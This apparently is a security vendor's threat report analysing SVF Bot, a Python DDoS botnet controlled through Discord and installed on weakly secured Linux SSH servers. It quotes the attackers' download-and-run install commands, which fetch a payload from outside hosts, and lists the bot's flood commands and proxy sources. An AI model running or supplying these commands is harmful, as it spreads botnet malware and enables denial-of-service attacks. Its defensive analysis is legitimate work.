Attacks Targeting Linux SSH Servers to Install SVF DDoS Bot
AhnLab SEcurity intelligence Center (ASEC) is monitoring attacks targeting poorly managed Linux servers by utilizing multiple honeypots. One of the most common honeypots is the SSH service using weak credentials, and a large number of DDoS and CoinMiner threat actors are attacking this service.
ASEC has recently identified a case of an attack that installs DDoS Bot malware called SVF Botnet from an external source. SVF Bot is developed in Python and uses Discord as its C&C server. It also utilizes multiple proxy servers during DDoS attacks.
1. SVF Botnet Attack
The threat actor attempted to log in to the honeypot Linux server and successfully installed SVF Bot with the following command. As SVF Bot is developed in Python, it installs the required libraries internally.
> # python -m venv venv; source ./venv/bin/activate; pip install discord discord.py requests aiohttp lxml; wget hxxps://termbin[.]com/4ccx -O main.py; python main.py -s 5
2. Analysis of SVF Bot
The source code contains a description stating that the malware was created by “SVF Team” and that it was developed for fun because the Botnet using PuTTY was not working.
Figure 1. SVF Bot
When the SVF Bot is executed, it can authenticate with the Discord server using the following Bot Token and then operate according to the threat actor’s commands. When executed, it also uses a webhook to send the server name. The server name was set to 5 through the -s argument in the installation command, which acts as a group to allow the threat actor to send DDoS commands to each group.
Most of the supported commands are for DDoS attacks, with L7 HTTP Flood and L4 UDP Flood being the main types supported. The following is a list of supported commands.
| Command | Argument | Description |
|---|---|---|
| $help | N/A | Introduces Botnet (Only the first server responds) |
| $methods | N/A | DDoS attack method (Only the first server responds) |
| $load | <http> <maxtime> | Scrapes public proxy addresses, validates them, and then saves them into a list (used in L7 HTTP flood attacks) |
| $unload | <http> | Resets proxy list |
| $customhttp | <threads> <times> <semaphore> <bypasscheck)> <servers/concurrents> <website> | L7 HTTP flood (Custom) |
| $http | <servers/concurrents> <website> | L7 HTTP flood |
| $customudp | <ip:port> <Packet Strength> <threads> <Packets Per Thread> <servers/concurrents> | L4 UDP flood (Custom) |
| $udp | <servers/concurrents> <ip:port> | L4 UDP flood |
| $restart | N/A | Update |
| $crash | N/A | Force shutdown |
| $stop | N/A | Stops HTTP flood attack |
Table 1. List of commands
Figure 2. Part of the HTTP flood attack routine
This is a DDoS bot malware with a simple structure, but it is unique in that it supports proxies for HTTP flood attacks. The malware first obtains a list of proxy addresses from the following 10 addresses and then goes through a validation process of logging into Google with the address before adding them to the list. Afterward, when launching an HTTP flood attack, the malware randomly selects a proxy address from the list to use when attempting to connect.
| Public Proxy Address |
|---|
| hxxps://sslproxies[.]org/ |
| hxxps://free-proxy-list[.]net/ |
| hxxps://www.us-proxy[.]org/ |
| hxxps://raw.githubusercontent[.]com/ShiftyTR/Proxy-List/master/http.txt |
| hxxps://raw.githubusercontent[.]com/jetkai/proxy-list/main/online-proxies/txt/proxies-http.txt |
| hxxps://raw.githubusercontent[.]com/officialputuid/KangProxy/KangProxy/http/http.txt |
| hxxps://raw.githubusercontent[.]com/mmpx12/proxy-list/master/http.txt |
| hxxps://raw.githubusercontent[.]com/mmpx12/proxy-list/master/https.txt |
| hxxps://raw.githubusercontent[.]com/roosterkid/openproxylist/main/HTTPS_RAW.txt |
| hxxps://raw.githubusercontent[.]com/proxy4parsing/proxy-list/main/http.txt |
Table 2. Websites with public proxy addresses saved
Figure 3. Obtaining public proxy addresses and validation routine
Note that after the update, SVF Bot can be downloaded again and installed with the following command. As of now, the download is not available, but an improved version of SVF Bot may be distributed in the future.
> pip install discord && pip install requests && pip install lxml && curl -sL hxxp://146.59.239[.]144:55/ > main.py && python main.py -s {server}
3. Conclusion
There have been cases of installing SVF DDoS Bot on poorly managed Linux servers. When SVF DDoS Bot is installed, the Linux server can be exploited as a DDoS Bot by receiving commands from the threat actor.
Administrators should use passwords that are difficult to guess and change them regularly to protect the Linux server from brute force and dictionary attacks, and patch their system to the latest version to prevent vulnerability attacks. For servers that are publicly accessible from outside, security solutions such as firewall must be used to control access from threat actors. Lastly, AhnLab V3 should be updated to the latest version to prevent malware infection in advance.
Gain access to related IOCs and detailed analysis by subscribing to AhnLab TIP. For subscription details, click the banner below.
